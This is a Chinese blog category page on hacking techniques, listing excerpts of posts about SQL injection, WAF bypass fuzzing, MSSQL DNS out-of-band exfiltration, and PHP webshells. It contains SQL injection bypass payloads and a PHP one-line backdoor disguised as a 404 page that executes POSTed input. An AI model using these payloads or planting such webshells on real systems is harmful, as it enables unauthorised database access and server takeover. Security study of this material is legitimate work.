![](https://img-blog.csdnimg.cn/20201014180756925.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
黑客技术
文章平均质量分 84
00后初来乍到
00后中级开发工程师
展开
-
SQL注入原理轻松了解_学渗透必看
上次说到三兄弟用XSS和CSRF这两个工具获利颇丰,后来人们在编程中很注意防范,这两个漏洞越来越少了,逼得三兄弟不得不开辟新财路。没看上一篇的请先看上一篇:xss获取用户cookie如此简单,你学会了吗?1另辟蹊径老二给大家提了一个建议:“要不我们试一试SQL注入?”老大说:“老掉牙的东西了,1998年都有了,估计漏洞也没几个了吧?”“那不一定啊,反正我们要节源开流,我最近找了一个网站,可以让老三来练练手。”老三一听又可以学到新东西了,非常兴奋:“二哥,你先给我说说什么是转载 2021-08-19 22:48:12 · 147 阅读 · 0 评论 -
实战sql注入绕过安全狗
实战安全狗bypass之前有段时间一直在弄注入绕过,正好一个朋友手上有个安全狗的站绕过 and 1=1这种很显然直接被拦截,这里进行fuzzand 1 like 1 拦截and /!1=1/ 不拦截and hex(1) 不拦截%23%0a 1=1 拦截绕过order by发现单个order不拦截 单个by不拦截 只要order by 结合就被拦截安全狗他拦截哪里我们就绕哪里order%23%0aby 1 不拦截order /!by/ 1拦截.转载 2021-08-19 22:33:37 · 589 阅读 · 0 评论 -
字符串拼接的sql注入实战
在某次漏洞挖掘的过程中,发现了一个比较有意思的bool注入。在常规的and和or构造payload不能用的情况下,最后利用了字符串拼接的方法实现了注入。注入点在account处。利用单引号稍稍测试即可发现输出的不同之处。尝试闭合的时候,发现平时用的好好的payload都不管用了,死活闭合不上。见图。这里有个小waf可以用注释+换行的方法过掉按理来说这里应该是可以闭合上的才对。但是直接报了个参数错误(后面多次测试后猜测应该是sql句子语法报错的时候返回的错误提示信息)or不原创 2021-08-19 22:32:18 · 1246 阅读 · 0 评论 -
记录某微两处SQL注入
前言以下两个SQL注入最新版本均已修复。虽然漏洞比较水,一眼就看的出但还是记录一下。源码审计,还是想搭下相应的环境对漏洞复现更能直观反映,发现其要导入相应的license证书才能正常使用。看了下证书的生成发现没有私钥绕不过(太菜了),那只能用暴力方法把源代码校验方法给改了。主要改两个文件:1.classbean/api/login/util/LoginUtil.class的beforeCheckUser函数修改private String beforeCheckUser(HttpServlet原创 2021-08-19 22:31:08 · 691 阅读 · 1 评论 -
高级的MSSQL注入技巧
tl;dr本文列举了几种改进的MSSQL注入技巧,所有的攻击向量都至少在三个最新版本的Microsoft SQL Server上进行了测试:2019、2017、2016SP2。DNS Out-of-Band如果遇到带有禁用堆栈查询的完全盲SQL注入,则可以通过函数 fn_xe_file_target_read_file, fn_get_audit_file,和fn_trace_gettable实现DNS带外(OOB)数据泄露。利用fn_xe_file_target_read_file(...原创 2021-08-19 22:30:01 · 241 阅读 · 0 评论 -
sql注入攻击的原理(sql注入攻击防范)
SQL 注入(SQLi)是一种可执行恶意 SQL 语句的注入攻击。这些 SQL 语句可控制网站背后的数据库服务。攻击者可利用 SQL 漏洞绕过网站已有的安全措施。他们可绕过网站的身份认证和授权并访问整个 SQL 数据库的数据。他们也可利用 SQL 注入对数据进行增加、修改和删除操作。SQL 注入可影响任何使用了 SQL 数据库的网站或应用程序,例如常用的数据库有 MySQL、Oracle、SQL Server 等等。攻击者利用它,便能无需授权地访问你的敏感数据,比如:用户资料、个人数据、商业机密、知识产原创 2021-08-19 22:26:09 · 28461 阅读 · 4 评论 -
PHP一句话木马大全
PHP一句话木马大全由于PHP一句话木马可以说有很多,简单的、中等的、复杂的…,今天主要是分享一些比较强悍的一些PHP一句话木马大全;一、利用404页面隐藏PHP小马404 Not FoundNot FoundThe requested URL was not found on this server.<?php@preg_replace("/[pageerror]/e",$_POST['error'],"saft");header('HTTP/1.1 404 Not Foun原创 2021-05-31 16:02:22 · 5185 阅读 · 3 评论